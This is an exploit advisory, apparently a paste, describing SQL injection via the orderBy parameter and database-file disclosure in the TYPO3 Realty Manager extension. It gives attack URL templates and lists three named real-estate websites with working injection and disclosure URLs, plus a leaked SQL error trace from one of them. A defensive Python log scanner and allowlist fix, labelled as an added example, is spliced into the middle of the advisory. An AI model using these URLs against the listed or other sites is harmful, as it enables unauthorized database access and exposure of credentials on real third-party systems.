KingSkrupellos

Typo3 Realty Manager tx_realty_pi1 2.0.0 SQL Inj DB Disc

Feb 18th, 2019
############################################################################################

# Exploit Title : Typo3 CMS Realty Manager tx_realty_pi1 2.0.0 SQL Injection / Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/02/2019
# Vendor Homepage : typo3.org ~ oliverklee.de
# Software Download Link : github.com/TYPO3-svn-archive/realty/archive/master.zip
extensions.typo3.org/extension/download/realty/2.0.0/zip/
# Software Information Link : extensions.typo3.org/extension/realty/
github.com/TYPO3-svn-archive/realty
# Software Version : From 0.1.0 - 0.5.3 to 2.0.0 / All Versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

############################################################################################

# Description about Software :
***************************
Provides a plugin that displays realty objects (properties, real estate), including an image gallery for each object.

############################################################################################

# Impact :
***********
* The Typo3 Realty Manager tx_realty_pi1 2.0.0 [ and other versions ] extension for TYPO3 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in the application's database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser.

* On the other hand, this software is prone to an information exposure/database disclosure vulnerability. Successful exploits of this issue may allow an attacker to obtain sensitive information by downloading the full contents of the application's database.

* Any remote user may download the database files and gain access to sensitive information including unencrypted authentication credentials.

############################################################################################

# SQL Injection Exploit :
***********************

/index.php?id=[ID-NUMBER]&tx_realty_pi1%5Bcity%5D=[ID-NUMBER]&tx_realty_pi1%5Bdistrict%5D=[ID-NUMBER]&tx_realty_pi1%5BorderBy%5D=[SQL Injection]

# Database Disclosure Exploit :
***************************

/typo3conf/ext/realty/ext_tables.sql

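Added example (not from the advisory or the realty extension): a Python scanner that flags, in constructed Apache access-log lines, tx_realty_pi1[orderBy] values that are not bare column identifiers and fetches of any extension's ext_tables.sql (the extension's table-definition file), plus the allowlist mapping that is the usual fix for an injectable ORDER BY. The identifier rule, the sort-key allowlist, and the sample IPs and paths are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (Apache combined format); IPs and paths are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Feb/2019:10:01:02 +0000] "GET /index.php?id=33&tx_realty_pi1%5Bcity%5D=1&tx_realty_pi1%5BorderBy%5D=1%27 HTTP/1.1" 500 512 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Feb/2019:10:01:09 +0000] "GET /index.php?id=33&tx_realty_pi1%5Bcity%5D=1&tx_realty_pi1%5BorderBy%5D=title HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Feb/2019:10:02:15 +0000] "GET /typo3conf/ext/realty/ext_tables.sql HTTP/1.1" 200 4096 "-" "curl/7.64.0"
198.51.100.7 - - [18/Feb/2019:10:02:20 +0000] "GET /typo3conf/ext/realty/pi1/style.css HTTP/1.1" 200 1200 "-" "curl/7.64.0"
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Assumption: a legitimate sort key is a bare column name (letters, digits, underscore).
SORT_KEY_RE = re.compile(r'^[A-Za-z_][A-Za-z0-9_]*$')
# ext_tables.sql under any extension directory should never be served to clients.
EXT_SQL_RE = re.compile(r'^/typo3conf/ext/[^/]+/ext_tables\.sql$')

def scan_log(text):
    """Return a list of (ip, reason) findings for requests matching either issue."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        url = urlsplit(m.group('target'))
        if EXT_SQL_RE.match(url.path):
            findings.append((m.group('ip'), 'ext_tables.sql fetched (status %s)' % m.group('status')))
        params = parse_qs(url.query, keep_blank_values=True)  # decodes %5B / %5D to [ ]
        for value in params.get('tx_realty_pi1[orderBy]', []):
            if not SORT_KEY_RE.match(value):
                findings.append((m.group('ip'), 'non-identifier orderBy value %r' % value))
    return findings

# Assumed allowlist: public sort keys mapped to real column names; only these reach the SQL.
ALLOWED_SORT = {'city': 'tx_realty_objects.city', 'starttime': 'tx_realty_objects.starttime'}

def order_by_clause(user_value):
    """Build ORDER BY from the allowlist; the raw parameter is never interpolated."""
    column = ALLOWED_SORT.get(user_value)
    if column is None:
        raise ValueError('unknown sort key')
    return 'ORDER BY ' + column
```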
############################################################################################

# Example Vulnerable Sites :
*************************
[+] dietmar-buecher.de/index.php?id=33&tx_realty_pi1%5Bcity%5D=1&tx_realty_pi1%5Bdistrict%5D=11818&tx_realty_pi1%5BorderBy%5D=1%27

[+] fuggerstadtimmobilien.de/typo3conf/ext/realty/ext_tables.sql

[+] baden-baden-exklusiv-immobilien.de/typo3conf/ext/realty/ext_tables.sql

############################################################################################

# Example SQL Database Error :
****************************
You have an error in your SQL syntax; check the manual that corresponds to your
MariaDB server version for the right syntax to use near 'LIMIT 0,1' at line 1

The last built query
*****************
SELECT COUNT(*) AS oelib_counter FROM tx_realty_objects
INNER JOIN tx_realty_cities ON tx_realty_objects.city = tx_realty_cities.uid
WHERE 1=1 AND tx_realty_objects.deleted=0 AND tx_realty_objects.t3ver_state
<=0 AND tx_realty_objects.pid<>-1 AND tx_realty_objects.hidden=0 AND
tx_realty_objects.starttime<=1550508420 AND (tx_realty_objects.endtime=0 OR
tx_realty_objects.endtime>1550508420) AND tx_realty_cities.deleted=0 AND
house_type = 2 AND tx_realty_objects.city = 1 AND tx_realty_objects.project_id = LIMIT 0,1

#0 /home/jail/home/buecher/htdocs/typo3conf/ext/oelib/class.tx_oelib_db.php(394):
tx_oelib_db::select('COUNT(*) AS oel...', 'tx_realty_objec...', '1=1 AND tx_real...', '', '', '0,1')

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

############################################################################################